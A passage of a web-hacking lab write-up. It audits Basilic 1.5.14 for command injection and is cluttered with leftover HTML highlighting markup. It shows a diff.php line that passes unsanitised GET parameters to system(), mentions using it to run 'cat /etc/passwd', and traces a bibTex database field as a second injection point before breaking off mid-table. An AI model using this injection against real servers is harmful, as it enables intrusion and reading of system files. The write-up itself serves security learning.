/spanspan class="nb"cd/span www/basilic-1.5.14//span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep -r system */span span class="code-line"span class="go"CHANGELOG: Minor bug fixes. Easier update of an existing Basilic system./span/span span class="code-line"span class="go"checkConfig.php: This file is part of the Basilic system/span/span span class="code-line"span class="go"checkConfig.php: system(#39;echo $PATH#39;);/span/span span class="code-line"span class="go"checkConfig.php: system(quot;which \quot;convert\quot;quot;);/span/span span class="code-line"span class="go"checkConfig.php:$message.=quot;Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\nquot;;/span/span span class="code-line"span class="go"checkConfig.php: echo quot;An e-mail has been sent to Basilic system administrator (lt;codegt;/tmp/basilic-log.txtlt;/codegt;). Check that you received it.lt;br/gt;\nquot;;/span/span span class="code-line"span class="go"Config/install.html: This file is part of the Basilic system/span/span span class="code-line"span class="go"Config/install.html:updating an existing lt;codegt;Basiliclt;/codegt; system, see the lt;a href=quot;#updatequot;gt;update sectionlt;/agt;)./span/span span class="code-line"span class="gp"Config/diff.php:system(quot;diff ../$_GET[old]/$_GET[file] $/span_GETspan class="o"[/spannewspan class="o"]/span/span class="nv"$_GET/spanspan class="o"[/spanfilespan class="o"]/span span class="p"|/span sed s%span class="se"\quot;/spanlt;span class="se"\quot;/span%span class="se"\quot;\amp;/spanltspan class="p";/spanspan class="se"\quot;/span%g span class="p"|/span sed s%span class="se"\quot;/spangt;span class="se"\quot;/span%span class="se"\quot;\amp;/spangtspan class="p";/spanspan class="se"\quot;/span%gspan class="s2"quot;);/span/span span class="code-line"span class="go"Config/tables.txt:# This file is part of the Basilic system/span/span span class="code-line"span class="go"Config/checkConfig.php: This file is part of the Basilic system/span/span span class="code-line"span class="go"Config/checkConfig.php: system(#39;echo $PATH#39;);/span/span span class="code-line"span class="go"Config/checkConfig.php: system(quot;which \quot;@@[email protected]@\quot;quot;);/span/span span class="code-line"span class="go"Config/checkConfig.php:$message.=quot;Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\nquot;;/span/span span class="code-line"span class="go"Config/checkConfig.php: echo quot;An e-mail has been sent to Basilic system administrator (lt;codegt;@@[email protected]@lt;/codegt;). Check that you received it.lt;br/gt;\nquot;;/span/span span class="code-line"span class="go"Config/tables.txt.new:# This file is part of the Basilic system/span/span span class="code-line"span class="go"configure:# This file is part of the Basilic system/span/span span class="code-line"span class="go"configure:# All these paths are expressed with respect to web server file system./span/span span class="code-line"span class="go"Import/bibtex2table:# This file is part of the Basilic system/span/span span class="code-line"span class="go"Import/pyxdkbibtex.py:# This file is part of the Basilic system/span/span span class="code-line"span class="go"index.html: This file is part of the Basilic system/span/span span class="code-line"span class="go"index.html: lt;ligt;Simple semi-automatic system installationlt;/ligt;/span/span span class="code-line"span class="go"install.html: This file is part of the Basilic system/span/span span class="code-line"span class="go"install.html:updating an existing lt;codegt;Basiliclt;/codegt; system, see the lt;a href=quot;#updatequot;gt;update sectionlt;/agt;)./span/span span class="code-line"span class="go"Intranet/updatePubliDocs.php: @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go"Intranet/install.html: This file is part of the Basilic system/span/span span class="code-line"span class="go"Intranet/install.html:updating an existing lt;codegt;Basiliclt;/codegt; system, see the lt;a href=quot;#updatequot;gt;update sectionlt;/agt;)./span/span span class="code-line"span class="go"Intranet/cnrs.html:system./span/span span class="code-line"span class="go"Intranet/basilic.html: lt;ligt;Simple semi-automatic system installationlt;/ligt;/span/span span class="code-line"span class="go"LICENCE:operating system on which the executable runs, unless that component/span/span span class="code-line"span class="go"LICENCE:integrity of the free software distribution system, which is/span/span span class="code-line"span class="go"LICENCE:through that system in reliance on consistent application of that/span/span span class="code-line"span class="go"LICENCE:system; it is up to the author/donor to decide if he or she is willing/span/span span class="code-line"span class="go"LICENCE:to distribute software through any other system and a licensee cannot/span/span span class="code-line"span class="go"Public/updatePubliDocs.php: @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go"Sources/CSS/backoffice.css:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/CSS/publi.css:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/CSS/header.css:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/CSS/listpubli.css:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/CSS/basilic.css:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/search.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/index.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/updatePubliDocs.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/updatePubliDocs.php: @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go"Sources/Public/setLanguage.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/publiUtils.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/getLanguage.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/header.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/footer.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/utils.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Public/publi.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/updatePubliDocs.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/updatePubliDocs.php: @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go"Sources/Intranet/intro.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/commonMenu.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/cnrs.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/cnrs.html:system./span/span span class="code-line"span class="go"Sources/Intranet/Publications/publiAction.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Publications/index.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Publications/publi.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Publications/updatePublis.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Publications/menuPubli.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/basilic.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/basilic.html: lt;ligt;Simple semi-automatic system installationlt;/ligt;/span/span span class="code-line"span class="go"Sources/Intranet/index.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/utils.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Authors/authorAction.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Authors/menuAuthor.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Authors/index.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"Sources/Intranet/Authors/author.php:This file is part of the Basilic system/span/span span class="code-line"span class="go"Binary file Sources/Intranet/Images/import.jpg matches/span/span span class="code-line"span class="go"Binary file Sources/Intranet/Images/export.jpg matches/span/span span class="code-line"span class="go"Sources/Intranet/usersguide.html:This file is part of the Basilic system/span/span span class="code-line"span class="go"usersguide.html: This file is part of the Basilic system/span/span span class="code-line"/code/pre/div /td/tr/table p2 things stick out at me here. Firstly, on line 11 there is clearly a command injection vulnerability here:/p pimg src="/assets/images/web-hacking/basilic-first-cmdi.png" width="750" height="500"/p pHere I am just running codecat /etc/passwd/code and you can see the output on the page./p pAs it turns out, this is that actual vulnerability that the challenge required, regardless, I was unhappy with this and carried on looking for the other command injection that I thought was there. Lastly, on lines 27, 37, 46 and 55 contain this string: [email protected]("rm $publiPath/$thumbDir/$src.jpg", $retVal);/code/p pThere are 3 parts of this call to codesystem/code which could be vuilnerable to command injection, looking through 1 of the files that contain this string to figure out if we can manipulate this value:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/span span class="code-line"span class="normal"91/span/span span class="code-line"span class="normal"92/span/span span class="code-line"span class="normal"93/span/span span class="code-line"span class="normal"94/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$publiPath#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"publiPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"quot;/spanspan class="p";/span/span span class="code-line"span class="go" if (!is_dir($publiPath))/span/span span class="code-line"span class="go" mkdir($publiPath, 0777);/span/span span class="code-line"span class="go" if (!is_dir($publiPath))/span/span span class="code-line"span class="go" error(quot;Error : directory $publiPath could not be created.quot;);/span/span span class="code-line"span class="gp" $/spanspan class="nv"file/spanspan class="o"=/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"/index.phpquot;/spanspan class="p";/span/span span class="code-line"span class="go" if (!is_dir(quot;$publiPath/$thumbDirquot;))/span/span span class="code-line"span class="go" mkdir(quot;$publiPath/$thumbDirquot;) or error(quot;Unable to create $publiPath/$thumbDir directoryquot;);/span/span span class="code-line"span class="gp" $/spanspan class="nv"thumbDirOk/span span class="o"=/span span class="o"(/spanis_dirspan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"quot;/spanspan class="o"))/span span class="o"amp;amp;/span span class="o"(/spanis_writablespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"quot;/spanspan class="o"))/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"dir/span span class="o"=/span dirspan class="o"(/spanspan class="nv"$publiPath/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if ($file != quot;.quot; amp;amp; $file != quot;..quot; amp;amp; is_file(quot;$publiPath/$filequot;))/span/span span class="code-line"span class="gp" $/spanentryspan class="o"[/spanspan class="s2"quot;sizequot;/spanspan class="o"]/span span class="o"=/span filesizespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$file/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"imgSize/span span class="o"=/span getimagesizespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$file/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" exec(quot;MAGICK_HOME=quot;.getenv(quot;MAGICK_HOMEquot;).quot;; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbNamequot;, $output, $returnVar);/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" if (!copy(quot;@@[email protected]@/@@[email protected]@/defaultThumb.jpgquot;, quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="go" if (is_file(quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="gp" $/spanspan class="nv"imgSize/span span class="o"=/span getimagesizespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"//spanspan class="nv"$thumbName/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" sendMessage(quot;Unrecognized document format for file $publiPath/$filequot;);/span/span span class="code-line"span class="go" if (!is_file(quot;$publiPath/$thumbDir/$src.jpgquot;))/span/span span class="code-line"span class="go" @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$pubPath#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"pubPath/span span class="o"=/span span class="s2"quot;@@[email protected]@quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"publiPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msg/span span class="o"=/span span class="s2"quot;lt;a href=#39;//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"#39;gt;/spanspan class="nv"$row/spanspan class="s2"[bibTex]lt;/agt; amp;nbsp; quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"yearPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$row/spanspan class="s2"[year]quot;/spanspan class="p";/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$msgPath#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"msgPath/span span class="o"=/span span class="s2"quot;/spanspan class="nv"$row/spanspan class="s2"[year]//spanspan class="nv"$row/spanspan class="s2"[bibTex]quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"publiPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msg/span span class="o"=/span span class="s2"quot;lt;a href=#39;//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"#39;gt;/spanspan class="nv"$row/spanspan class="s2"[bibTex]lt;/agt; amp;nbsp; quot;/spanspan class="p";/span/span span class="code-line"span class="go" error(quot;Publication directory $msgPath does not exist.quot;);/span/span span class="code-line"span class="go" error(quot;Unable to create /$msgPath/index.phpquot;);/span/span span class="code-line"span class="go" sendMessage(quot;Thumbnail directory $msgPath/$thumbDir is not writeablequot;);/span/span span class="code-line"span class="go" echo quot; $msg : Creating $msgPath/$thumbDir/$thumbNamelt;br /gt;\nquot;;/span/span span class="code-line"span class="go" echo quot;Unable to create thumbnail for $msgPath/$file. Administrator has been warnedquot;;/span/span span class="code-line"span class="go" sendMessage(quot;Unable to create thumbnail for $msgPath/$file error=$returnVarquot;);/span/span span class="code-line"span class="go" // sendMessage(quot;Thumbnail up to date for quot;.$msgPath.$file);/span/span span class="code-line"span class="go" echo quot;Unable to create thumbnail for $msgPath/$file. Administrator has been warnedquot;;/span/span span class="code-line"span class="go" sendMessage(quot;Unable to determine image size for $msgPath/$filequot;);/span/span span class="code-line"span class="go" echo quot;Thumbnail will soon be created for $msgPath/$file.lt;br/gt;\nquot;;/span/span span class="code-line"span class="go" sendMessage(quot;Thumbnail must be created for $msgPath/$filequot;);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to copy default movie thumb for $msgPath/$filequot;);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to retrieve thumbnail size for $msgPath/$filequot;);/span/span span class="code-line"span class="go" echo quot;Unrecognized document format : $msgPath/$filelt;br/gt;\nquot;;/span/span span class="code-line"span class="go" sendMessage(quot;Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn#39;t exist !quot;);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to remove $msgPath/$thumbDir/$src.jpgquot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$thumbDir#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"thumbDir/spanspan class="o"=/spanspan class="s2"quot;.thumbsquot;/spanspan class="p";/span/span span class="code-line"span class="go" if (!is_dir(quot;$publiPath/$thumbDirquot;))/span/span span class="code-line"span class="go" mkdir(quot;$publiPath/$thumbDirquot;) or error(quot;Unable to create $publiPath/$thumbDir directoryquot;);/span/span span class="code-line"span class="gp" $/spanspan class="nv"thumbDirOk/span span class="o"=/span span class="o"(/spanis_dirspan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"quot;/spanspan class="o"))/span span class="o"amp;amp;/span span class="o"(/spanis_writablespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"quot;/spanspan class="o"))/spanspan class="p";/span/span span class="code-line"span class="go" if (!$thumbDirOk)/span/span span class="code-line"span class="go" sendMessage(quot;Thumbnail directory $msgPath/$thumbDir is not writeablequot;);/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" echo quot; $msg : Creating $msgPath/$thumbDir/$thumbNamelt;br /gt;\nquot;;/span/span span class="code-line"span class="go" exec(quot;MAGICK_HOME=quot;.getenv(quot;MAGICK_HOMEquot;).quot;; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbNamequot;, $output, $returnVar);/span/span span class="code-line"span class="go" if ($thumbDirOk amp;amp; !is_file(quot;$publiPath/$thumbDir/$thumbNamequot;) || filemtime(quot;$publiPath/$filequot;) gt; (filemtime(quot;$publiPath/$thumbDir/$thumbNamequot;)))/span/span span class="code-line"span class="go" if (!copy(quot;@@[email protected]@/@@[email protected]@/defaultThumb.jpgquot;, quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="go" if (is_file(quot;$publiPath/$thumbDir/$thumbNamequot;))/span/span span class="code-line"span class="gp" $/spanspan class="nv"imgSize/span span class="o"=/span getimagesizespan class="o"(/spanspan class="s2"quot;/spanspan class="nv"$publiPath/spanspan class="s2"//spanspan class="nv"$thumbDir/spanspan class="s2"//spanspan class="nv"$thumbName/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if (!is_file(quot;$publiPath/$thumbDir/$src.jpgquot;))/span/span span class="code-line"span class="go" sendMessage(quot;Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn#39;t exist !quot;);/span/span span class="code-line"span class="go" @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to remove $msgPath/$thumbDir/$src.jpgquot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$src#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"src/span span class="o"=/span ereg_replacespan class="o"(/spanspan class="s2"quot;.*source=#39;([^#39;]*).*quot;/span, span class="s2"quot;\\1quot;/span, span class="nv"$docInDataBase/spanspan class="o"[/spanspan class="s2"quot;/spanspan class="nv"$docId/spanspan class="s2"quot;/spanspan class="o"])/spanspan class="p";/span/span span class="code-line"span class="go" echo quot; $msg : Removing $src from databaselt;br /gt;\nquot;;/span/span span class="code-line"span class="go" if (!is_file(quot;$publiPath/$thumbDir/$src.jpgquot;))/span/span span class="code-line"span class="go" sendMessage(quot;Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn#39;t exist !quot;);/span/span span class="code-line"span class="go" @system(quot;rm $publiPath/$thumbDir/$src.jpgquot;, $retVal);/span/span span class="code-line"span class="go" sendMessage(quot;Unable to remove $msgPath/$thumbDir/$src.jpgquot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$row#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="go"function sourceString($row)/span/span span class="code-line"span class="go" return quot;type=#39;quot;.$row[quot;typequot;].quot;#39;, source=#39;quot;.$row[quot;sourcequot;].quot;#39;quot;;/span/span span class="code-line"span class="go"function sizeString($row)/span/span span class="code-line"span class="go" return quot;size=#39;quot;.$row[quot;sizequot;].quot;#39;, sizeX=#39;quot;.$row[quot;sizeXquot;].quot;#39;, sizeY=#39;quot;.$row[quot;sizeYquot;].quot;#39;quot;;/span/span span class="code-line"span class="go" while ($result amp;amp; $row=mysql_fetch_array($result))/span/span span class="code-line"span class="gp" $/spandocInDataBasespan class="o"[/spanspan class="nv"$row/spanspan class="o"[/spanspan class="s2"quot;idquot;/spanspan class="o"]]=/spansourceStringspan class="o"(/spanspan class="nv"$row/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spandocSizespan class="o"[/spanspan class="nv"$row/spanspan class="o"[/spanspan class="s2"quot;idquot;/spanspan class="o"]]=/spansizeStringspan class="o"(/spanspan class="nv"$row/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"row/spanspan class="o"=/spanmysql_fetch_arrayspan class="o"(/spanspan class="nv"$result/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msgPath/span span class="o"=/span span class="s2"quot;/spanspan class="nv"$row/spanspan class="s2"[year]//spanspan class="nv"$row/spanspan class="s2"[bibTex]quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"msg/span span class="o"=/span span class="s2"quot;lt;a href=#39;//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$msgPath/spanspan class="s2"#39;gt;/spanspan class="nv"$row/spanspan class="s2"[bibTex]lt;/agt; amp;nbsp; quot;/spanspan class="p";/span/span span class="code-line"span class="gp" $/spanspan class="nv"yearPath/span span class="o"=/span span class="s2"quot;@@[email protected]@//spanspan class="nv"$pubPath/spanspan class="s2"//spanspan class="nv"$row/spanspan class="s2"[year]quot;/spanspan class="p";/span/span span class="code-line"span class="go" echo quot;Creating year directory $row[year]lt;br/gt;\nquot;;/span/span span class="code-line"span class="go" echo quot;Creating index.php in $row[year]lt;br/gt;\nquot;;/span/span span class="code-line"span class="go" fwrite($f, quot;lt;quot;.quot;?php if (empty(\$_GET[\quot;year\quot;])) \$year=$row[year]; include(\quot;../index.php\quot;); ?quot;.quot;gt;quot;);/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spangrep span class="s1"#39;$result#39;/span Sources/Intranet/updatePubliDocs.php/span span class="code-line"span class="gp" $/spanspan class="nv"result/span span class="o"=/span sqlQueryspan class="o"(/spanspan class="s2"quot;SELECT * FROM docs, publidocs WHERE publidocs.idPubli=/spanspan class="nv"$publiId/spanspan class="s2" AND publidocs.idDoc=docs.idquot;/spanspan class="o")/spanspan class="p";/span /span span class="code-line"span class="go" while ($result amp;amp; $row=mysql_fetch_array($result))/span/span span class="code-line"span class="gp" $/spanspan class="nv"result/span span class="o"=/span sqlQueryspan class="o"(/spanspan class="s2"quot;SELECT year, bibTex FROM publis WHERE id=/spanspan class="nv"$publiId/spanspan class="s2"quot;/spanspan class="o")/spanspan class="p";/span/span span class="code-line"span class="go" if ($result)/span/span span class="code-line"span class="gp" $/spanspan class="nv"row/spanspan class="o"=/spanmysql_fetch_arrayspan class="o"(/spanspan class="nv"$result/spanspan class="o")/spanspan class="p";/span/span span class="code-line"/code/pre/div /td/tr/table pHere I am searching through the file codeSources/Intranet/updatePubliDocs.php/code for each section on that string. First I search for code$publiPath/code on line 1 and its clear from line 2 that code$publiPath/code is made from the string [email protected]@[email protected]@/$pubPath/$msgPath/code./p pWe can't manipulate [email protected]@[email protected]@/code, so next I search for code$pubPath/code on line 24. Line 25 makes it clear that we are unable to manipulate this too so next I search for code$msgPath/code on line 29. It looks like we might be able to manipulate this but let's check the other parts first./p pOn line 49 I search for code$thumbDir/code but line 50 shows we can't manipulate this and on line 67 I search for code$src/code but line 68 shows this isn't useful./p pSo back to code$msgPath/code, the code that sets it code$msgPath = "$row[year]/$row[bibTex]";/code on line 30 shows that the variable code$row/code is used. Searching for code$row/code, on line 74, shows that it is set using a MySQL query on line 82. This query is built and put into the variable code$result/code before run./p pLastly I search for code$result/code on line 89, which shows that the actual query that is being run is codeSELECT year, bibTex FROM publis WHERE id=$publiId/code on line 92. So its made of 2 fields codeyear/code and codebibTex/code in the codepublis/code table./p pLooking at the a href="https://en.wikipedia.org/wiki/Database_schema" target="_blank"schema/a, year is a 4 digit year field, which isn't useful to us, but codebibTex/code is a 20 character field, we can use this although we will be limited to 20 characters at a time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span 